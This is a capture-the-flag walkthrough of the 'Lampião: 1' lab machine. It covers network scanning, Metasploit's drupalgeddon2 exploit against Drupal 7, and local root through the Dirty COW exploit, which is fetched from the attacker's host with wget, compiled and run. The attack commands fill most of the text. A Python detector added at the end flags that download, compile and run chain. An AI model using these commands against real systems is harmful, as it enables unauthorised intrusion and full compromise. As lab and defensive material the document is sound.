Lampião: 1

Lab Environment

Attacker's Machine - Linux kali 4.18.0-kali1-amd64 #1 SMP Debian 4.18.6-1kali1 (2018-09-10) x86_64 GNU/Linux

Vulnerable Machine - Lampião: 1

Proof Of Concept

Scanning Phase
arp-scan --local (to scan for the machines connected to the network)
vulnerable machine IP - 192.168.43.17


Now I will use nmap to scan the machine's IP further

nmap -p- -Pn 192.168.43.17


Next I tried to access the IP on port 1898


Then I used nikto for further enumeration

Syntax for nikto : nikto -h 192.168.43.17:1898
Useful result : Drupal 7 is installed


So I searched exploit-db for Drupal 7 exploits and found one.
Exploit : drupalgeddon2
It is already present on my machine.


I fired up msfconsole to use drupalgeddon2 on the target machine
Syntax to search for an exploit in msfconsole : search exploit name


Now I have to use the exploit
Syntax to use the exploit : use exploit/unix/webapp/drupal_drupalgeddon2


Now I have to provide the options the exploit requires in order to exploit the target IP
Syntax to show the exploit's required options : show options OR options


Now set the required fields as follows :
set RHOST 192.168.43.17
set RPORT 1898
After providing the required options, just run the exploit
Syntax to run the exploit : exploit
And I got the meterpreter session



Then I entered the shell by simply typing shell in meterpreter


I was unable to open the root directory as I did not have enough permissions.
So I understood that I had to escalate privileges.
So I entered the tmp directory and found the info of the target machine by just typing uname -a
I learned that the target machine is Ubuntu 14.04 LTS
So I downloaded the Dirty COW exploit from exploit-db (https://www.exploit-db.com/exploits/40847/) to escalate privileges on the target machine


Now I started a Python server on my attacking machine so as to transfer 40847.cpp to the target machine.


Command used to download the file to the target machine from the server
Command : wget http://<attacker's machine IP, where the file was originally downloaded>/Downloads/40847.cpp


After it had been downloaded to the tmp directory of the target machine, I ran it simply by using the following commands.
Command : 1) g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
          2) ./dcow -s
And finally got the flag.
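
A defender's view of the last steps above, as an added example that is not part of the original walkthrough: it flags a web-service account fetching, compiling and running a binary from a scratch directory. The "user|cwd|command" event format, the account names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumptions (not from the walkthrough): process-execution events exported as
# "user|cwd|command" lines, and these service-account names.
WEB_USERS = {"www-data", "apache", "nginx"}
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
RULES = [
    ("recon", re.compile(r"^uname\s+-a\b")),
    ("download", re.compile(r"^(wget|curl)\s")),
    ("compile", re.compile(r"^(gcc|g\+\+|cc|clang(\+\+)?)\s")),
    ("run-local-binary", re.compile(r"^\./\S+")),
]
CHAIN = ["download", "compile", "run-local-binary"]

# Constructed sample events mirroring the commands in the walkthrough.
SAMPLE = """\
www-data|/tmp|uname -a
www-data|/tmp|wget http://192.0.2.10/Downloads/40847.cpp
www-data|/tmp|g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
www-data|/tmp|./dcow -s
alice|/home/alice/src|g++ -O2 -o tool main.cpp
root|/tmp|wget https://example.org/pkg.tar.gz
"""

def in_scratch(cwd):
    """True when cwd is a scratch directory or lies below one."""
    return any(cwd == d or cwd.startswith(d + "/") for d in SCRATCH_DIRS)

def detect(text):
    """Return (alerts, chained_users) for web-account activity in scratch dirs."""
    alerts, seen = [], defaultdict(list)
    for line in text.splitlines():
        if line.count("|") < 2:
            continue  # skip blank or malformed events
        user, cwd, cmd = (f.strip() for f in line.split("|", 2))
        if user not in WEB_USERS or not in_scratch(cwd):
            continue
        for name, rx in RULES:
            if rx.search(cmd):
                alerts.append((user, name, cmd))
                seen[user].append(name)
    # Escalate when download -> compile -> run occurs in that order for one account.
    chained = []
    for user, names in seen.items():
        it = iter(names)
        if all(step in it for step in CHAIN):
            chained.append(user)
    return alerts, chained
```

Calling detect(SAMPLE) returns one alert per matching command plus the accounts that completed the whole download, compile, run chain, which is the signal worth paging on.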


   